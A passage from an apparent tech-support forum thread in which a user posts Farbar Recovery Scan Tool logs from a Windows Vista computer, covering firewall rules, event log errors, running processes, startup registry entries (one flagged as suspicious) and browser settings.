FirewallRules: [{8231B56C-8AA5-4DB1-B7BA-6EFB9852FD11}] => (Allow) C:\Program Files (x86)\Dell Video Chat\DellVideoChat.exe
FirewallRules: [{0FA34347-DBB4-496F-B057-0C7BF90A1765}] => (Allow) C:\Program Files (x86)\Dell Video Chat\DellVideoChat.exe
FirewallRules: [{8502FBEE-4902-4E12-A440-C2763044592F}] => (Allow) C:\Program Files\CyberLink\PowerDVD DX\PowerDVD.exe
FirewallRules: [{5E33A72A-0EB8-460A-9E79-5D33349705F9}] => (Allow) C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe
FirewallRules: [{BD42D8D3-0C82-488B-9C36-3D9EB63A2D47}] => (Allow) C:\Program Files (x86)\Common Files\aol\acs\AOLDial.exe
FirewallRules: [{5FEE2D57-74DF-4148-A2E5-72A86B75C649}] => (Allow) C:\Program Files (x86)\Common Files\aol\acs\AOLDial.exe
FirewallRules: [{2043639E-B5B7-45C2-A99F-099EE9BF8A7F}] => (Allow) C:\Program Files (x86)\Common Files\aol\acs\AOLacsd.exe
FirewallRules: [{9E797555-45B8-4FB8-923F-E68BDEB2EBEE}] => (Allow) C:\Program Files (x86)\Common Files\aol\acs\AOLacsd.exe
FirewallRules: [{F81AE30B-FB0E-41A3-B68E-80D46134D9B0}] => (Allow) C:\Program Files (x86)\Common Files\aol\1225226945\ee\aolsoftware.exe
FirewallRules: [{BD52F696-9697-404A-8F39-0A96E032C374}] => (Allow) C:\Program Files (x86)\Common Files\aol\1225226945\ee\aolsoftware.exe
FirewallRules: [{31B9103E-D02A-4E8F-8758-18B5A8675784}] => (Allow) C:\Program Files (x86)\AOL 9.1\waol.exe
FirewallRules: [{CABA289E-319E-4F0E-B8D0-517C3694EABF}] => (Allow) C:\Program Files (x86)\AOL 9.1\waol.exe
FirewallRules: [{5A50C113-6BC3-4BBD-9713-BB86E933EA01}] => (Allow) C:\Program Files (x86)\Common Files\aol\TopSpeed\3.0\aoltpsd3.exe
FirewallRules: [{69B57AF6-89DC-4292-9C52-856E7D9A21A2}] => (Allow) C:\Program Files (x86)\Common Files\aol\TopSpeed\3.0\aoltpsd3.exe
FirewallRules: [{305C62F5-F89F-46CD-8566-6EA807C3D1E9}] => (Allow) C:\Program Files (x86)\Common Files\aol\Loader\aolload.exe
FirewallRules: [{25949A3A-27A2-4F0B-9174-7A272D664888}] => (Allow) C:\Program Files (x86)\Common Files\aol\Loader\aolload.exe
FirewallRules: [{E329B7FB-0624-48DE-B80D-27D93D7D4BE6}] => (Allow) C:\Program Files (x86)\Common Files\aol\System Information\sinf.exe
FirewallRules: [{E5481570-F9C4-4B9D-AED4-AB14486A3703}] => (Allow) C:\Program Files (x86)\Common Files\aol\System Information\sinf.exe
FirewallRules: [{6D20654B-BB68-43B8-8DAC-071AE2AB3A4C}] => (Allow) C:\Program Files (x86)\AIM6\aim6.exe
FirewallRules: [{C076B208-40DF-4BDB-A384-26C99A4788D8}] => (Allow) C:\Program Files (x86)\AIM6\aim6.exe
FirewallRules: [TCP Query User{E8828832-CD94-4F98-BCEC-6718AE6A0E7A}C:\program files (x86)\internet explorer\iexplore.exe] => (Allow) C:\program files (x86)\internet explorer\iexplore.exe
FirewallRules: [UDP Query User{8785FD17-DAB9-47FE-BD6E-CD658B66EB99}C:\program files (x86)\internet explorer\iexplore.exe] => (Allow) C:\program files (x86)\internet explorer\iexplore.exe
FirewallRules: [TCP Query User{D3D2A2A0-55F8-43FF-8525-F6A8EF46872B}C:\program files (x86)\myspace\im\myspaceim.exe] => (Block) C:\program files (x86)\myspace\im\myspaceim.exe
FirewallRules: [UDP Query User{92A5C238-8C8A-41A7-ACB0-64A067D672F8}C:\program files (x86)\myspace\im\myspaceim.exe] => (Block) C:\program files (x86)\myspace\im\myspaceim.exe
FirewallRules: [TCP Query User{38458AFF-5900-4E44-B5B8-58A76EFD6139}C:\program files (x86)\java\jre6\bin\java.exe] => (Allow) C:\program files (x86)\java\jre6\bin\java.exe
FirewallRules: [UDP Query User{27263D7D-4D5A-4EAA-91C3-E0C31BB1FA12}C:\program files (x86)\java\jre6\bin\java.exe] => (Allow) C:\program files (x86)\java\jre6\bin\java.exe
FirewallRules: [TCP Query User{54865894-FDCF-4FC8-9619-CA11ADF8679B}C:\program files (x86)\aim\aim.exe] => (Block) C:\program files (x86)\aim\aim.exe
FirewallRules: [UDP Query User{07C7D077-B64F-4DE2-92A2-BE87F38F4C3F}C:\program files (x86)\aim\aim.exe] => (Block) C:\program files (x86)\aim\aim.exe
FirewallRules: [TCP Query User{E4E134F3-AF98-4F8E-B5A5-F27EF069539E}C:\program files (x86)\aim\aim.exe] => (Allow) C:\program files (x86)\aim\aim.exe
FirewallRules: [UDP Query User{F7AE3640-965E-4376-B4E0-ED2511C447F1}C:\program files (x86)\aim\aim.exe] => (Allow) C:\program files (x86)\aim\aim.exe
FirewallRules: [{41FBA0F1-4CC4-49DB-9AF3-3C43BF6940EB}] => (Allow) C:\Program Files (x86)\AOL 9.5\waol.exe
FirewallRules: [{42066CB8-2269-4EDD-B1EB-12668EFC0C0E}] => (Allow) C:\Program Files (x86)\AOL 9.5\waol.exe
FirewallRules: [TCP Query User{0FFD9AE2-49DC-4A3B-9222-151CAD34D34A}C:\program files (x86)\dell video chat\dellvideochat.exe] => (Allow) C:\program files (x86)\dell video chat\dellvideochat.exe
FirewallRules: [UDP Query User{1F2F193F-E345-4494-803A-6D98C83DE9B8}C:\program files (x86)\dell video chat\dellvideochat.exe] => (Allow) C:\program files (x86)\dell video chat\dellvideochat.exe
FirewallRules: [{51486B28-6663-4252-A824-CEBA1D54F916}] => (Allow) C:\Program Files (x86)\MySpace\IM\MySpaceIM.exe
FirewallRules: [{8F8D8C50-4423-4B7B-AAF6-36A5E2A23C55}] => (Allow) C:\Program Files (x86)\AOL 9.5a\waol.exe
FirewallRules: [{57F0A163-F1BC-499C-A843-A80D701B8956}] => (Allow) C:\Program Files (x86)\AOL 9.5a\waol.exe
FirewallRules: [{D2E27BDC-EB2B-462F-BDB0-D8D940D92F09}] => (Allow) C:\Program Files (x86)\AIM7\aim.exe
FirewallRules: [{DC2C19E6-C0E5-4605-A7CD-68F6A98D6F13}] => (Allow) C:\Program Files (x86)\AIM7\aim.exe
FirewallRules: [{A7563E34-3FAD-4A40-9233-143877E59A33}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\wlcsdk.exe
FirewallRules: [{F6C2AF67-C32A-4412-98C6-83E748B9EB7C}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{01628688-915B-4B26-ADD9-DAB44E409517}] => (Allow) svchost.exe
FirewallRules: [{8DDE1490-36E5-4D34-8C0B-686F984DD6BD}] => (Allow) C:\Program Files (x86)\Windows Live\Sync\WindowsLiveSync.exe
FirewallRules: [{F253449D-EAF6-4DAF-8B3E-0C0FC02362D1}] => (Allow) LPort=80
FirewallRules: [{AB026861-E3ED-4AB8-9D00-8F40706056DD}] => (Allow) LPort=80
FirewallRules: [{CB4FD7E5-1D14-476D-A886-8F7DA34C4F39}] => (Allow) LPort=80
FirewallRules: [{18ED92B9-E6F6-478F-A7CF-DAA226DB5B09}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe
FirewallRules: [{3AA6A666-40D9-4098-836C-3678C6DAB417}] => (Allow) C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe
FirewallRules: [{EE19CFD7-A08B-464D-87FA-27EF98343EFB}] => (Allow) C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe
FirewallRules: [{9E12FEAE-E4CC-4C77-98DD-AEF13095AD25}] => (Allow) C:\Program Files (x86)\AOL Desktop 9.7\waol.exe
FirewallRules: [{2D18DE15-A408-4618-AF38-BAE2E0D58168}] => (Allow) C:\Program Files (x86)\AOL Desktop 9.7\waol.exe
FirewallRules: [{9A35707B-BFEF-4299-923F-89C64CEED5C7}] => (Allow) C:\Program Files (x86)\AOL Desktop 9.7\AOLBrowser\aolbrowser.exe
FirewallRules: [{A56400D8-4781-4A3F-9043-4FDAA68FCE40}] => (Allow) C:\Program Files (x86)\AOL Desktop 9.7\AOLBrowser\aolbrowser.exe
FirewallRules: [{F62F2D50-D7FE-4EF9-8E4E-A94233CC0BCB}] => (Allow) C:\Program Files (x86)\AOL Desktop 9.7a\waol.exe
FirewallRules: [{A17346CF-282E-4E1F-B12E-D158BEFAE4FD}] => (Allow) C:\Program Files (x86)\AOL Desktop 9.7a\waol.exe
FirewallRules: [{6FA630E9-1B30-41C7-B8A3-339A6485716A}] => (Allow) C:\Program Files (x86)\AOL Desktop 9.7a\aolbrowser.exe
FirewallRules: [{65F483B8-6ED7-4871-9A84-E5CA8663F08E}] => (Allow) C:\Program Files (x86)\AOL Desktop 9.7a\aolbrowser.exe
FirewallRules: [{644AF81B-C200-4345-9B96-EDF1643EDC83}] => (Allow) C:\Program Files (x86)\AOL Desktop 9.7b\waol.exe
FirewallRules: [{F542CAD3-D553-4F23-8E75-511C00DC7433}] => (Allow) C:\Program Files (x86)\AOL Desktop 9.7b\waol.exe
FirewallRules: [{1BC7405E-E50B-49D5-B480-78B0E5565002}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{81C826AA-F783-4BB3-9F5C-D59DF9B799CC}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{2C2ACD4F-9335-403F-B726-094678DDD218}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe

==================== Restore Points =========================

13-06-2016 11:10:08 Scheduled Checkpoint

==================== Faulty Device Manager Devices =============

Name: isatap.hsd1.de.comcast.net.
Description: Microsoft ISATAP Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.


==================== Event log errors: =========================

Application errors:
==================
Error: (08/30/2016 10:37:08 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (08/30/2016 10:36:16 AM) (Source: WinDefendRtp) (EventID: 3003) (User: )
Description: Windows Defender Real-Time Protection checkpoint has encountered an error and failed to start.

    User: JHS-JJS-Dell8mg\JHS-JJS

    Checkpoint ID: 24

    Error Code: 0x80070005

    Error description: Access is denied.

Error: (08/30/2016 10:05:11 AM) (Source: WinDefendRtp) (EventID: 3003) (User: )
Description: Windows Defender Real-Time Protection checkpoint has encountered an error and failed to start.

    User: JHS-JJS-Dell8mg\JHS-JJS

    Checkpoint ID: 24

    Error Code: 0x80070005

    Error description: Access is denied.

Error: (08/30/2016 10:03:00 AM) (Source: SideBySide) (EventID: 35) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Windows Live\Photo Gallery\MovieMaker.Exe".Error in manifest or policy file "C:\Program Files (x86)\Windows Live\Photo Gallery\WLMFDS.DLL" on line 8.
Component identity found in manifest does not match the identity of the component requested.
Reference is WLMFDS,processorArchitecture="AMD64",type="win32",version="1.0.0.1".
Definition is WLMFDS,processorArchitecture="x86",type="win32",version="1.0.0.1".
Please use sxstrace.exe for detailed diagnosis.

Error: (08/30/2016 10:03:00 AM) (Source: SideBySide) (EventID: 35) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Windows Live\Photo Gallery\MovieMaker.Exe".Error in manifest or policy file "C:\Program Files (x86)\Windows Live\Photo Gallery\WLMFDS.DLL" on line 8.
Component identity found in manifest does not match the identity of the component requested.
Reference is WLMFDS,processorArchitecture="AMD64",type="win32",version="1.0.0.1".
Definition is WLMFDS,processorArchitecture="x86",type="win32",version="1.0.0.1".
Please use sxstrace.exe for detailed diagnosis.

Error: (08/30/2016 10:02:36 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (08/29/2016 04:18:15 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005.
This is often caused by incorrect security settings in either the writer or requestor process.


Operation:
   Gathering Writer Data

Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {9051d2d0-3019-4e46-bb45-d95e50f38a4b}

Error: (08/29/2016 03:53:34 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application uistub.exe, version 22.7.1.32, time stamp 0x57b2e5fb, faulting module MSVCP110.dll, version 6.0.6002.19623, time stamp 0x56ec4641, exception code 0xc0000135, fault offset 0x00000000000b7e68,
process id 0x17f4, application start time 0x01d2022f016ffa80.

Error: (08/29/2016 03:41:35 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (08/29/2016 03:41:00 PM) (Source: WinDefendRtp) (EventID: 3003) (User: )
Description: Windows Defender Real-Time Protection checkpoint has encountered an error and failed to start.

    User: JHS-JJS-Dell8mg\JHS-JJS

    Checkpoint ID: 24

    Error Code: 0x80070005

    Error description: Access is denied.


System errors:
=============
Error: (08/30/2016 10:47:34 AM) (Source: volsnap) (EventID: 20) (User: )
Description: The shadow copies of volume C: were aborted because of a failed free space computation.

Error: (08/30/2016 10:34:32 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: The server {E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} did not register with DCOM within the required timeout.

Error: (08/30/2016 10:02:00 AM) (Source: netbt) (EventID: 4321) (User: )
Description: The name "WORKGROUP      :1d" could not be registered on the interface with IP address 192.168.1.105.
The computer with the IP address 192.168.1.1 did not allow the name to be claimed by
this computer.

Error: (08/30/2016 10:01:47 AM) (Source: Print) (EventID: 19) (User: NT AUTHORITY)
Description: The print spooler failed to share printer Canon MX850 series Printer with shared resource name Canon MX850 series Printer. Error 2114. The printer cannot be used by others on the network.

Error: (08/30/2016 10:01:47 AM) (Source: Print) (EventID: 19) (User: NT AUTHORITY)
Description: The print spooler failed to share printer Canon MX870 series Printer with shared resource name Canon MX870 series Printer. Error 2114. The printer cannot be used by others on the network.

Error: (08/30/2016 10:01:47 AM) (Source: Print) (EventID: 19) (User: NT AUTHORITY)
Description: The print spooler failed to share printer PageManager PDF Writer with shared resource name PageManager PDF Writer. Error 2114. The printer cannot be used by others on the network.

Error: (08/29/2016 04:18:38 PM) (Source: WinDefend) (EventID: 3006) (User: )
Description: Windows Defender Real-Time Protection agent has encountered an error when taking action on spyware or other potentially unwanted software.

For more information please see the following:
Not Applicable

    Scan ID: {FE7166AF-EC58-4E79-A734-5487CDE1A527}

    User: JHS-JJS-Dell8mg\JHS-JJS

    Name: Unknown

    ID:

    Severity ID:

    Category ID:

    Path: driver:ATWPKT2

    Alert Type: Unclassified software

    Action: Quarantine

    Error Code: 0x80508021

    Error description: An unexpected problem occurred. Install any available updates, and then try to start the program again. For information on installing updates, see Help and Support.

Error: (08/29/2016 04:18:38 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: The server {E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} did not register with DCOM within the required timeout.

Error: (08/29/2016 03:51:48 PM) (Source: DCOM) (EventID: 10016) (User: JHS-JJS-Dell8mg)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
{0C0A3666-30C9-11D0-8F20-00805F2CD064}
 to the user JHS-JJS-Dell8mg\JHS-JJS SID (S-1-5-21-1231050607-2223395895-1768608861-1000) from address LocalHost (Using LRPC). This security permission can be modified using the Component Services administrative tool.

Error: (08/29/2016 03:41:06 PM) (Source: netbt) (EventID: 4321) (User: )
Description: The name "WORKGROUP      :1d" could not be registered on the interface with IP address 192.168.1.105.
The computer with the IP address 192.168.1.1 did not allow the name to be claimed by
this computer.


CodeIntegrity:
===================================
  Date: 2016-08-09 12:27:49.555
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\winsxs\amd64_microsoft-windows-tcpip-binaries_31bf3856ad364e35_6.0.6001.18000_none_0f3cadd61ec3b22c\tcpip.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-08-09 12:27:48.635
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\winsxs\amd64_microsoft-windows-tcpip-binaries_31bf3856ad364e35_6.0.6001.18000_none_0f3cadd61ec3b22c\tcpip.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-08-09 12:27:47.783
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\winsxs\amd64_microsoft-windows-tcpip-binaries_31bf3856ad364e35_6.0.6001.18000_none_0f3cadd61ec3b22c\tcpip.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-08-09 12:27:46.987
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\winsxs\amd64_microsoft-windows-tcpip-binaries_31bf3856ad364e35_6.0.6001.18000_none_0f3cadd61ec3b22c\tcpip.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-08-09 12:27:45.175
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\winsxs\amd64_microsoft-windows-securestartup-core_31bf3856ad364e35_6.0.6001.18000_none_90f9416caa7c6a08\fveapi.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-08-09 12:27:44.273
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\winsxs\amd64_microsoft-windows-securestartup-core_31bf3856ad364e35_6.0.6001.18000_none_90f9416caa7c6a08\fveapi.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-08-09 12:27:43.480
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\winsxs\amd64_microsoft-windows-securestartup-core_31bf3856ad364e35_6.0.6001.18000_none_90f9416caa7c6a08\fveapi.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-08-09 12:27:42.566
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\winsxs\amd64_microsoft-windows-securestartup-core_31bf3856ad364e35_6.0.6001.18000_none_90f9416caa7c6a08\fveapi.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-08-09 12:27:34.426
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\tcpip.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-08-09 12:27:33.600
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\tcpip.sys because the set of per-page image hashes could not be found on the system.


==================== Memory info ===========================

Processor: Intel® Core™2 Quad CPU Q8200 @ 2.33GHz
Percentage of memory in use: 47%
Total physical RAM: 8190.26 MB
Available physical RAM: 4279.86 MB
Total Virtual: 16431.56 MB
Available Virtual: 12968.73 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:1177.27 GB) (Free:1082.85 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive d: (RECOVERY) (Fixed) (Total:15 GB) (Free:8.35 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 1192.3 GB) (Disk ID: B0000000)
Partition 1: (Not Active) - (Size=71 MB) - (Type=DE)
Partition 2: (Not Active) - (Size=15 GB) - (Type=07 NTFS)
Partition 3: (Active) - (Size=1177.3 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================



#4
[email protected]

    Member

  • Topic Starter
  • 18 posts

Two of Two

FRST txt

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 29-08-2016
Ran by JHS-JJS (administrator) on JHS-JJS-DELL8MG (30-08-2016 10:40:30)
Running from C:\Users\JHS-JJS\Desktop
Loaded Profiles: JHS-JJS (Available Profiles: JHS-JJS)
Platform: Windows Vista ™ Home Premium Service Pack 2 (X64) Language: English (United States)
Internet Explorer Version 9 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Andrea Electronics Corporation) C:\Windows\System32\AERTSr64.exe
(AOL Inc.) C:\Program Files (x86)\Common Files\aol\acs\AOLacsd.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAANTmon.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\VS7Debug\mdm.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security Suite\Engine\22.7.1.32\n360.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft SQL Server\90\Shared\sqlbrowser.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Conexant Systems, Inc.) C:\Windows\System32\drivers\XAudio64.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCui.exe
(Realtek Semiconductor) C:\Windows\RAVCpl64.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAAnotif.exe
(CANON INC.) C:\Program Files\Canon\MyPrinter\BJMYPRT.EXE
() C:\Windows\System32\spool\drivers\x64\3\WrtMon.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(W3i, LLC) C:\Program Files (x86)\W3i\InstallIQUpdater\InstallIQUpdater.exe
(Logitech, Inc.) C:\Program Files\Logitech\SetPoint\SetPoint.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Nuance Communications, Inc.) C:\Program Files (x86)\ScanSoft\OmniPageSE4\OpWareSE4.exe
(AOL Inc.) C:\Program Files (x86)\Common Files\aol\1225226945\ee\aolsoftware.exe
() C:\Windows\System32\spool\drivers\x64\3\WrtProc.exe
() C:\Program Files\Logitech\SetPoint\x86\SetPoint32.exe
(Microsoft Corporation) C:\Windows\System32\mobsync.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security Suite\Engine\22.7.1.32\n360.exe
(Logitech, Inc.) C:\Program Files\Common Files\Logishrd\KHAL2\KHALMNPR.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security Suite\Engine\22.7.1.32\conathst.exe
(Microsoft Corporation) C:\Windows\System32\wbem\WMIADAP.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [1584184 2008-01-20] (Microsoft Corporation)
HKLM\...\Run: [RtHDVCpl] => C:\Windows\RAVCpl64.exe [6431232 2008-07-18] (Realtek Semiconductor)
HKLM\...\Run: [IAAnotif] => C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\iaanotif.exe [178712 2008-05-07] (Intel Corporation)
HKLM\...\Run: [CanonSolutionMenu] => C:\Program Files (x86)\Canon\SolutionMenu\CNSLMAIN.exe [652624 2007-10-25] (CANON INC.)
HKLM\...\Run: [CanonMyPrinter] => C:\Program Files\Canon\MyPrinter\BJMyPrt.exe [2710856 2009-11-01] (CANON INC.)
HKLM\...\Run: [WrtMon.exe] => C:\Windows\system32\spool\drivers\x64\3\WrtMon.exe [20480 2006-09-20] ()
HKLM\...\Run: [Skytel] => Skytel.exe
HKLM-x32\...\Run: [Microsoft Default Manager] => C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe [439568 2010-05-10] (Microsoft Corporation)
HKLM-x32\...\Run: [SunJavaUpdateSched] => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2013-05-01] (Apple Inc.)
HKLM-x32\...\Run: [OpwareSE4] => C:\Program Files (x86)\ScanSoft\OmniPageSE4\OpwareSE4.exe [73728 2007-06-13] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [HostManager] => C:\Program Files (x86)\Common Files\AOL\1225226945\ee\AOLSoftware.exe [41800 2010-03-08] (AOL Inc.)
HKLM-x32\...\Run: [Adobe ARM] => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
HKU\S-1-5-19\...\Run: [WindowsWelcomeCenter] => C:\Windows\system32\oobefldr.dll [2438656 2009-04-11] (Microsoft Corporation)
HKU\S-1-5-20\...\Run: [WindowsWelcomeCenter] => C:\Windows\system32\oobefldr.dll [2438656 2009-04-11] (Microsoft Corporation)
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [138240 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\...\Run: [**njop<*>] => "C:\Users\JHS-JJS\AppData\Local\b263cb\84e7ae.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\...\Run: [swg] => "C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\...\Run: [Google Update] => "C:\Users\JHS-JJS\AppData\Local\Google\Update\GoogleUpdate.exe" /c
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\...\Run: [InstallIQUpdater] => C:\Program Files (x86)\W3i\InstallIQUpdater\InstallIQUpdater.exe [1179648 2011-10-11] (W3i, LLC)
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\...\RunOnce: [Shockwave Updater] => C:\Windows\SysWOW64\Adobe\Shockwave 11\SwHelper_1103472.exe [460216 2009-01-16] (Adobe Systems, Inc.)
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\...\MountPoints2: {5c7703ed-05b0-11de-9b6c-00038a000015} - M:\LaunchU3.exe
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\...\MountPoints2: {8817984c-e0b8-11e2-928d-00038a000015} - L:\VZW_Software_upgrade_assistant_installer.exe
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\Bubbles.scr [899584 2006-11-02] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [  OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton Security Suite\Engine64\22.7.1.32\buShell.dll [2016-08-15] (Symantec Corporation)
ShellIconOverlayIdentifiers: [  OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton Security Suite\Engine64\22.7.1.32\buShell.dll [2016-08-15] (Symantec Corporation)
ShellIconOverlayIdentifiers: [  OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton Security Suite\Engine64\22.7.1.32\buShell.dll [2016-08-15] (Symantec Corporation)
ShellIconOverlayIdentifiers: [GDriveSharedOverlay] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} =>  No File
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Logitech SetPoint.lnk [2010-08-20]
ShortcutTarget: Logitech SetPoint.lnk -> C:\Program Files\Logitech\SetPoint\SetPoint.exe (Logitech, Inc.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76 192.168.1.1
Tcpip\..\Interfaces\{7B502934-EB48-4DA8-88AB-AD32601DC390}: [DhcpNameServer] 75.75.75.75 75.75.76.76 192.168.1.1

Internet Explorer:
==================
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.msn.com/?ocid=EIE9HP&PC=UP50
SearchScopes: HKLM-x32 -> {443789B7-F39C-4b5c-9287-DA72D38F4FE6} URL = hxxp://search.aol.com/aolcom/search?query={searchTerms}&invocationType=tb50TB50CLie7
SearchScopes: HKLM-x32 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxp://www.ask.com/web?&o=101881&l=dis&q={SEARCHTERMS}
